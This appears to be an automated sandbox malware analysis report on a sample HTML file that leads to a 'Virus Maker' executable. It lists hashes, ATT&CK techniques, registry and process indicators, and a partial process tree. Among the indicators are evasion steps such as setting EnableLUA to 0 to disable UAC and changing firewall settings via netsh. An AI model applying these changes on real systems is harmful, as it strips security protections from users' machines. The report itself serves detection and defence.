fbd9c67a5fb1b683135c22a37d24549102a15873922fbeb8431e4f4ae952dfd4

Analysis

max time kernel
541s
max time network
539s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
04-04-2024 21:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sample.html
Size

16KB
MD5

f53af83899b3d1657f728c4617a2d83e
SHA1

ff18be282c69de4f4322dbbf58b4bb6e57ec9f8b
SHA256

fbd9c67a5fb1b683135c22a37d24549102a15873922fbeb8431e4f4ae952dfd4
SHA512

0e3babca2d3db7554028c94124f4b39b0623aba9fd2088db9bc9ef0ed42a364095cb85c3c1fe7db934ffc9d043d47cc12c8239c1fe5ac15758ca53de64b43c3d
SSDEEP

192:x4ufWIyc+MDg9PxUfrULIAFCy8GAGYoQN6jWd7aG9If0O2FHT/ibLDiTq:x0Vig9pUfrUz8GAGM6K9VIB2Vbi/DiTq

Score

10^/10

evasion trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies Windows Firewall 2 TTPs 3 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1720	netsh.exe
4084	netsh.exe
1016	netsh.exe

Executes dropped EXE 20 IoCs

pid	Process
2320	Virus Maker.exe
4024	setup.exe
4312	setup.exe
584	setup.exe
1844	setup.exe
4388	setup.exe
5024	setup.exe
2468	setup.exe
4344	setup.exe
3488	setup.exe
4876	setup.exe
1764	setup.exe
1760	setup.exe
3020	setup.exe
5024	setup.exe
2356	setup.exe
4736	setup.exe
1972	setup.exe
4700	setup.exe
1852	setup.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
4436	taskkill.exe
4464	taskkill.exe
964	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133567386958834471"	chrome.exe

Modifies registry class 61 IoCs

description	ioc	Process
Key created	\Registry\User\S-1-5-21-4280069375-290121026-380765049-1000_Classes\NotificationData	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe110000001eb78b63c764da01d8a07b65c764da0157fb7f86c764da0114000000	Virus Maker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic"	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 000000000200000001000000ffffffff	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	Virus Maker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3\MRUListEx = ffffffff	Virus Maker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3\NodeSlot = "6"	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 03000000000000000200000001000000ffffffff	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	Virus Maker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 000000000100000002000000ffffffff	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Virus Maker.exe
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Virus Maker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Virus Maker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	Virus Maker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	Virus Maker.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Virus Maker.rar:Zone.Identifier	chrome.exe
File created	C:\Users\Admin\AppData\Local\Temp\7zO8380B3C7\Virus Maker.exe:Zone.Identifier	7zFM.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
3436	chrome.exe
3436	chrome.exe
1068	chrome.exe
1068	chrome.exe
2496	msedge.exe
2496	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1504	msedge.exe
1504	msedge.exe
3016	identity_helper.exe
3016	identity_helper.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2104	7zFM.exe
2320	Virus Maker.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
1272	msedge.exe
1272	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeRestorePrivilege	2104	7zFM.exe
Token: 35	2104	7zFM.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeSecurityPrivilege	2104	7zFM.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe
Token: SeCreatePagefilePrivilege	3436	chrome.exe
Token: SeShutdownPrivilege	3436	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
2104	7zFM.exe
2104	7zFM.exe
2320	Virus Maker.exe
2320	Virus Maker.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe

Suspicious use of SendNotifyMessage 30 IoCs

pid	Process
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
3436	chrome.exe
2320	Virus Maker.exe
2320	Virus Maker.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe
1272	msedge.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
2320	Virus Maker.exe
2320	Virus Maker.exe
2320	Virus Maker.exe
2320	Virus Maker.exe
2320	Virus Maker.exe
2320	Virus Maker.exe
2320	Virus Maker.exe
2320	Virus Maker.exe
2320	Virus Maker.exe
2320	Virus Maker.exe
2320	Virus Maker.exe
2104	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3436 wrote to memory of 5112	3436	chrome.exe	76
PID 3436 wrote to memory of 5112	3436	chrome.exe	76
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 4848	3436	chrome.exe	78
PID 3436 wrote to memory of 3272	3436	chrome.exe	79
PID 3436 wrote to memory of 3272	3436	chrome.exe	79
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80
PID 3436 wrote to memory of 4868	3436	chrome.exe	80

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\sample.html
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb9ba49758,0x7ffb9ba49768,0x7ffb9ba49778
  2⤵
  PID:5112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1616 --field-trial-handle=1736,i,2109911950315641335,3210840231739383509,131072 /prefetch:2
  2⤵
  PID:4848
- C:\Program Files\Google\Chrome\Application\chrome.exe
